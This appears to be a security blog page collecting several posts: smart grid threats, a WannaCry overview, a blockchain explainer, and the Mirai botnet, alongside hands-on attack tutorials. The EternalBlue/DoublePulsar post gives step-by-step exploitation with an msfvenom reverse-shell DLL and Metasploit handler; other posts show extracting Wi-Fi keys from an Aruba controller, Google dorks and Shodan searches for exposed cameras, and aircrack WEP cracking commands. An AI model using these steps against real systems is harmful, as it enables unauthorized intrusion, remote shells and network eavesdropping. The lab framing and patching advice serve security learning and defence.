Smart Grid – Cyber Security

Today smart grid a buzz word used by every IT/OT technology researcher, evangelists, enthusiasts. But do we really understand what it is, how it is going to change existing energy and utilities landscape, what all security threats and vulnerabilities it may face and what skills we as security professional need to gear ourselves with.

The legacy and analog grid systems are being migrated to ultra advance and digitally enabled smart electric grid systems to establish reliable form of communication between the consumer and the service provider, which will help in meeting exact demand, reducing costs, constant monitoring and power system availability via two way communication channel.

With the introduction of ICT (information and communication technologies) and massive integration between several components to an analog grid environment the landscape becomes more prone to cyber attacks. The arrangement of critical devices integrated with smart and digital technologies should be assessed for security threats and vulnerabilities in order to deploy sufficient solutions to minimize the impact and risks. An attacker can gain unauthorized access to ill-configured systems to destabilize the grid in unpredictable ways.

Security is the key component without it the smart grid network cannot function and sustain. Grids are critical infrastructure and needs to be protected from cyber threats. Due to exceptionally large landscape of distributed systems a smart grid offers a equally large attack surface for the attackers. Grid security can be jeopardized with a successful attack on a critical elements and cascade into a whole system blackout.

Domains in a Grid
———————-
According to NIST the smart grid is composed of 7 domains that are interconnected for improvising the way information flows between these components and which also enhances the business and technical processes involved. These elements are integrated to operate with each other to benefit the service provider and consumer of the service.

 

The advantages of migrating from conventional grid to modern and smart grid does not just end at integration of components, renewable energy and power consumption management. It also improve the reliability of electricity service, automated fault detection, advance safety measures, reducing the environmental impact also and this is possible to achieve through user-centric approach.

Vulnerabilities in Smart Grid
————————————

An attacker with expertise in exploiting vulnerabilities pertaining to IT network can also jeopardized the security of a smart grid due to similar system and network components. The attacks on critical sectors can be categorized into mainly three categories i.e. component, protocol and topology.

  • Vulnerabilities in any component in the field such as RTU (remote terminal units – used in energy sector to remotely command and manage the grid devices). These remotely managed components are subject to attack because the lack security aspect from design level.
  • Protocols (modbus, dnp3) utilized in the critical sectors are vulnerable to various cyber threats such as MiTM, sniffing attacks, buffer overflows, issuance of faulty states, false data injections, etc.
  • Denial of service attacks can also be launched against the grid devices to prevent supervisors from managing the devices.
  • An malicious user can spread malware in the environment through the use of removable devices to infect smart grid devices.
  • Replay attacks can be conducted where and attacker would be able to send false information such as tampered meter data, fake alerts, wrong controller values, etc.
  • Passive traffic analysis would be possible where an attacker would be able to capture and analyse network traffic to decipher critical data, if not encrypted.

The attack vertical range is quite exposed and vulnerable in current grid environment due to the legacy system still in use. Now introducing the smart and digital devices to the conventional grid infrastructure is going to increase the attack vertical, which needs to addresses by the energy and utilities companies along with the vendor developing smart develop from the design level.

A smart grid infrastructure is composed of hundreds of different devices working together to achieve consistent communication channel in between. A grid environment and its related the infrastructure can be segregated into two components systems and network.

  • Systems –  Smart meter, operation center, renewable energy resources, smart house hold appliances
  • Network – HAN (home area network) and WAN (wide area network)

Smart Meter is an embedded device with a volatile and non-volatile memory configured with wireless communication protocols and hardware to send meter readings to your service provider in order to generate accurate bills and for power consumption management. The smart meter acts as a gateway for the in-house smart devices and service providers to collect or feed-in needed information.

The flow of information between the smart in-house appliances and with the service provider can be achieved through various communication technologies already implemented and used widely in IT environment (HAN: Zigbee, wired or wireless, Ethernet and Bluetooth) (WAN: 3G, LTE, WiMax, GSM, fibre optics). This way a 2 way communication channel can be established between the consumer and service provider to send sub-hourly power usage from smart meters and data for constant monitoring to identify any abnormalities. The collection of information, sending instructions, generation of reports all these functions are generally handled by a centralized electric utility center.

In an HAN (home area network) is a small network composed of house hold appliances communicating with smart meters for facilitating efficient power consumption management. HANs are used in residential areas similarly BAN(business area network) & IANs (industrial area network) are used respective areas.

Whereas, WAN (wide area network) is a bigger network and an interconnection of HAN, BAN, IAN, smart meters and utility company.

Scenario to understand the difference:
————————————————
Let’s take an simple scenario to understand the advantages

Conventional grid: Customer bought in a new electrical appliance, he plugs it in and start operating. Though the installation and operation wise it seems easy but the customer will never be able to know how much power the new electrical applicance(until unless measures and monitored manually) is consuming and the service provider will not be able to optimize and meet the exact power demand.

Smart grid: Customer bought in a new electrical appliance, he plugs it in, registers the device with service provider over a toll-free call or through a web portal and start operating. Though we have few more steps involved before we can use the applicance, but the customer and the service provider will now be able to eliminate the gaps such as ineffective demand management, absence of critical usage information, accurate billing, smart power consumption, etc.

Bellow picture depicts the changes in conventional and smart grid.

Smart Grid Benefits
————————

  • Utilities : Larger portfolio of energy resources (renewable/non-renewable), increased grid efficiency and reliability, fewer blackouts and outages, automated fault detection and reduction in human error.
  • Consumer: Increased transparency with energy consumption and billing information, energy cost reduction by detailed pricing during peak hours, fewer billing errors and diversified payment methods.
  • Government: Adherence to international standards, minimized dependency on non-renewable sources by way of alternative renewable source of energy and advanced critical and national infrastructure supporting the countries mission-vision.

Conclusion
————–

Smart grid is basically an integration between the energy and IT layer which requires seamless integration of the elements like transmission and distribution sources, renewable energy sources, communication systems, etc.

Security should be the prime focus while designing a smart grid from the beginning. As IT and OT environment share the similar cyber threats as both of them work on IP based network. Due to integration being performed on such large scale managing cyber security and cloud computing application becomes a big challenge as the attack surface is also increased.

References:
NIST, clp.com.hk, reserachgate, Internet

Advertisements

Exploiting Windows 7 & 2008 with EternalBlue and DoublePulsar

Few weeks back ShadowBrokers and Equation Group two hacking groups managed to leak NSA’s version of hacking tool “Fuzz Bunch” which can be maliciously utilized to hack any Windows 7 and Server 2008 R2 (x64) All Service Packs without needing authentication.

The FuzzBunch tool kit comes with a pre-cooked exploit EternalBlue that exploits Windows SMB vulnerability and plugin DoublePulsar. For your information the same exploit code was taken advantage off to create WannaCry ransomeware that was successful in creating a big impact on computer networks all around the world.

With all that happened in the past, I decided to document the step by step approach of hacking a Windows 7 machine with FuzzBunch Toolkit.  So let’s get started.

Note: This tutorial is just for informational and educational purposes, the author will not be responsible for any illegal hacking attempts against individuals or a production network made by any individual or a group.

Environment:


  • Windows 7 : 10.21.1.118 : Attacking Machine installed with Fuzz Bunch (installation of fuzzbunch has few dependencies like python-2.6, pywin32-212)
  • Kali: 10.21.1.119: Second attacking machine that will be used for creating malicious dll and for gaining access
  • Windows 7: 10.21.1.124 : Victim
  1. Once you have the setup ready, execute “python fb.py” on windows attacking machine to initialize fuzzbunch toolkit.
  2. Next configure the victim IP,  fall back IP, redirection, project name and log directory (attacking Windows 7).
  3. The first step in exploitation is to select the EternalBlue exploit so we can execute the FuzzBunch. On the cmd prompt type “use EternalBlue” and press enter to configure the options available, such as target IP, port, target os, etc.
  4. Once you are done it will ask you to execute EternalBlue, you can press enter to execute on the target.
  5. As you can the target is successfully exploited and we should see the message “Eternalblue Succeeded”
  6. Now its time to gain access to the machine using the backdoor installed. And for this purpose we will use “msfvenom” available in kali to create a malicious dll and inject the same through “DoublePulsar” plugin.
  7. Execute the below msfvenom command to create a malicious dll. “msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<kali machine IP> LPORT=<any non-standard port> -f dll -o <filename.dll>”
  8. Copy the dll to windows attacking machine to be able to inject while using DoublePulsar plugin.
  9. Launch plugin by typing “use Doublepulsar” and configure target ip, port, protocol, target os architecture, malicious dll to be injected, etc.
  10. Before you execute the plugin open metasploit and use “exploit/multi/handler” with the same payload used while creating the dll and start listening.
  11. Now you are good to launch the “DoublePulsar” exploit, if all goes well you will successfully exploit the target to gain access.

Follow the similar steps to replicate the scenario in you test labs. Feel free to contact if you have any queries. charit0819[at]gmail[dot]com

PS: Metasploit has also developed modules for the detection and exploitation of the vulnerability.

WannaCry – A Simple Perspective

Till now more than 100 countries (UK, US, Russia, China, etc ) have been severely impacted by one of the professional crafted ransom-ware called “WannaCry” / “WannaCrypt”. The attack came into limelight when British National Health Service were targeted and their IT systems and patient information privacy was invaded and were bought down to knees. The worm has already made a damage worth millions and still likely to spread. Group name @0xSpamTech has claimed the responsibility. The worm encrypts the files using AES and RSA encryption which can only be decrypted using a unique key

As per wiki “Ransomware is a type of malicious software that carries out the cryptoviral extortion attack from cryptovirology that blocks access to data until a ransom is paid and displays a message requesting payment to unlock it”

But this worm/ransomware operates differently from their standard definition. The worm includes a component (payload) that searches for vulnerable systems on the network to infect them as well. Due to its unconventional behaviour the worm is able to continue infecting millions of Windows based machines all over the globe. The world of security has not witnessed a worm of such kind in the last 2 years.

WannaCry worm uses a publicly known exploit (MS17-010) which is trigger by sending a specially crafted packet to a SMBv1 server. The vulnerability is fixed now by Microsoft but millions of organizations are still yet to completely patch their IT infrastructure.

Microsoft has already release a set of patches that needs to be installed in every production environment to prevent and block the worm from spreading/infecting others. Follow the link to read more.

List of windows affected by this worm.
1. Windows XP
2. Microsoft Windows Vista SP2
3. Windows 7
4. Windows 8.1
5. Windows RT 8.1
6. Windows Server 2008 SP2 and R2 SP1
7. Windows Server 2012 and R2

Two signatures of worm infection is being observed, which it utilizes to infect vulnerable machines.
– Social Engineering, where the end user is persuaded/tricked to click on a link.
– Unpatched machines running vulnerable version of SMB (v1) protocol.

After infecting the target PC user will be presented with a message where they are asked to deposit 300$-600$ in a form of bitcoins for decrypting and unlocking their files.
wannacry_05_1024x774

If you are interested to track the payments made to hacker’s account please follow the link and you can track payments to their Bitcoin addresses listed below
– 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
– 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
– 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

How can you protect yourself
1. Get the latest pacthes available from Microsoft and deploy them ()
2. Disable SMBv1 completely
3. Add firewall rules on the perimeter firewall to block any incoming connection for port 445

Extracting Wi-Fi Passwords from Aruba Virtual Controller

password

Like usual I was conducting pentest and found an interesting way to extract the passwords for multiple access points managed using Aruba Virtual Controller IAP 105.

maxresdefault

What is a Virtual Controller ?

Aruba Instant virtual controller gives you the flexibility of configuring multiple access points from a centralized location.
You can distribute, store and regulate configuration to distributed access points from one place. Virtual controller is basically a single point of management for your configuration and firmware.
Fimware version prior to IAP-105 are vulnerable to access points password disclosure vulnerability, any malicious user having access to the management console can extract sensitive details using just browser(chrome, firefox, IE, etc.) debugger.
You can extract the passwords using below simple steps:
1. Login to Aruba virtual controller (in my case it was default admin-admin).
172-16-120-178_admin_admin
2. Click on the network you want to disclose wireless key for.
3. Click edit Factory Settings >> Go to Security Settings
4. Open browser’s debugger.
5. For the password text box change type to “text” in html.
6. Voila !!

Blockchain : The Future of Digital Payment

1

  1. What is Blockchain?

Today we rely completely on the middle man for our day to day services like banks, service providers, and credit card companies. Blockchain is a vast global distributed system acting as middlemen which runs on systems around the world and is open for everybody. Where trust in not established by a middleman but with mass collaboration, clever code and of course cryptography and that’s what this amazing technology is.

Usually while working with digital content you are sending a copy and retaining the original with yourself but when it comes to value based things like money, stocks bonds and financial assets, sending a copy is not a good idea, for example : If I am sending you 100 dollar a payment for something, it become really important that you have those 100 dollar and I have don’t, because if I can share the same 100 dollars among other transactions than the 100 dollars becomes worth less.

  1. How Blockchain works

Using Blockchain buyers and sellers can transfer value directly to each other over the internet in the most secure way possible without the need to third party. Blockchain is a distributed ledger maintained globally on multiple systems across the globe not owned by any specific party, the database of transaction is secure with clever code and strong cryptography making it hacker proof. Blockchain will do for business what internet did for communication.

Simple Real Life Example : A journey of diamonds from mines to consumer hands covers a complex path of legal, regulatory, financial manufacturing and commercial practices. Current supply chain for diamonds has to rely on intermediaries on every step of the way from government officials, dealers and banks which adds time and cost. Smuggling and frauds in diamonds trading can hamper governments in collecting fair export taxes and as a result consumers will face the cost of counterfeit products or unethically mined stones.

This is where Blockchain can come into picture to rescue us and has the capabilities to eliminate these vulnerabilities with distributed, secure and transparent transactions. Block chain provides all parties involved with synchronized network of transactions, it records every sequence of transactions from beginning to the end, whether it is 100 steps in procuring goods  or just a single direct transaction. Each transaction that occurs is put into the block and each block is connected with the one before and after it, then groups of transaction are attached together and the fingerprint of each transactions added to the next thus creating an irreversible chain.

Block chain is capable of tracking goods from the raw materials to the finished product in consumer’s hands with embedded security and transparency. Block chain is distributed, permission-ed and secure which makes it more reliable than the traditional payment systems used currently globally.

Blockchain ledgers are distributed across the network which ensures no one person or an organization can edit the transaction records. All parties involved in the trade of goods from raw to finished products owns a copy of every single transaction data and no transactions can be added to the Blockchain without consensus of across the parties involved. This means no single entity or a company can add or alter the transactions without being permanently recorded which makes it highly secure eliminating the risk of frauds.

  1. How to use and utilize Blockchain as an individual                                  A) Set up your Blockchain wallet (https://blockchain.info/)

2

3

B) Get some bit coins (https://bitcoin.com)

4

C) Find merchants who accept bitcoins and start trading

5

D) If you want to receive bitcoins you need to share the code generated by your wallet

6

  1. Blockchain Benefits and Challenges

Benefits

  • It enables to make exchange of value without a third party being involved
  • Wallet owners has full control over the information and resources
  • The data in Blockchain is consistent and secure
  • Due to its decentralized nature the technology is not prone to central point of failure
  • Any changes made to the transactional records is publicly viewable
  • Helps ins lowering transactions costs

Challenges

  • The underlying infrastructure needs to be reliable and robust to support faster transactions
  • Blockchain technology has to be accepted by the government regulations for its widespread adoption
  • Relatively higher energy is being consumed in validating Blockchain transactions
  • High initial capital is required for large business environments
  • Still a few privacy and security concerns needs to be addressed for gaining trust from general public

Mapping Mirai Botnet

mirai A malicious botnet made out of Mirai malware has disrupted internet traffic to popular websites like twitter, github, paypal, etc in the United States. According to popular network security companies the botnet was specially crafted to attack internet-connected cameras and DVRs. The Chinese company “Hangzhou Xiongmai Technology” (network camera manufacturers) has admitted that their devices were behind Fridays DDoS attack and they are recalling 3.8 million affected devices for fixing them. DNS service provider company Dyn has also confirmed that they observed millions of discrete IP addresses associated with the Mirai botnet. Most of the service providers affected by the botnet were able to easily recover from the attack but botnets like these can attack again in coming future. Last month the same botnet took Brian Kerb’s website down through delivering 665 Gbps of traffic.

How botnet works: The botnet is designed to brute force telnet service on internet-connected cameras installed with Dahua firmware or a generic management interface called “NETSurveillance” with 62 different combinations of usernames and passwords (admin:admin, admin:12345, etc.). Once botnet is able to successfully login into the camera login portals the services like telnet, ssh and HTTP are blocked and then device is seeded with malicious program that turns it into an enslaved bot. These bots will now report to the command and control centre from where DDoS attacks can be launched to make websites unresponsive. This attacks would have be avoided if the camera login panels or the real time streaming protocol service is restricted for remote access.

Source code released online : The author behind the Mirai malware has released the code online for research and development purpose stating “I have earn my share of money and now I want to get out of this business” Follow the link to download source code : https://github.com/jgamblin/Mirai-Source-Code.
What to do : The Chinese company has advised its customers to change default passwords and update the firmware of the device and keep the devices disconnected until patched. Few researchers are also augmenting on the subject why a devices like network camera needs remote access from internet and up to a certain level I am also in favor of this response. The companies making IoT devices should enforce the user during its initial configuration to change the default password and remote access to such sensitive and weak IoT devices should not be enabled.

How you can access unprotected network cameras :
1. Try searching on Google for “inurl:index.shtml” and follow the link with IP address in the url. If lucky enough you will be able to see live view of an internet connected camera live streaming from some other continent.

cam

2. Multiple websites are available on the internet that can be used to look for devices connected to the internet with a specific configuration. Below is the screenshot for your reference where I tried searching for specific network camera on the internet.
shodan
And clicking to any of the above listed options will take you to the login panel straight away. I think now you can also realized how easy it can be to attack a specific set of devices connected to the internet.
cam1Conclusion: It’s very probable to see such DDoS attacks in near future targeting vulnerable IoT device. The manufacturers of these devices should consider few basic security practices before shipping the products.

WI-FI (WEP) cracking with Aircrack (easy 4 steps)

In my last post I tried exploiting WEP wi-fi networks with wifite. Using  wifite was no co-incidence but I was facing few difficulties that forced me to use something simple and easy. But something kept bothering me inside, why I can not crack the same using aircrack and I desperately wanted to try it out.

So I woke up the next morning and started going through some of the best articles available on the web just to warm up a lil bit, which certainly helped. And here we are with a successful cracked WEP network

Follow the below steps to successfully crack WEP based wi-fi networks.

  1. Start your wi-fi interface in monitor mode with the command “airmon-ng start wlan0” ( I am using external wi-fi adapter for more attack surface)mon0
  2. Start listening to near available access points “airodump-ng mon0” and choose your target. For me the target will be the same as old one “*******250”.airodump
  3. Start listening to a specific WEP network “airodump -ng -c <channel no> -bssid <access point mac> -w <file name> mon0airodump2
  4. Once you see significant number of IVs are captured than go ahead and launch aircrack “aircrack-ng <file name>“.aircrack
  5. DONE !! 😀

Note : This tutorial is for educational purpose only, use the steps at your own risk and attack the AP which you own, unless and until you have permission from the owner please do not try this.

In my next post I will share my experience of trying to do get  this to  another level WPA/WPA2.

Lead Auditor & InfoSec Professional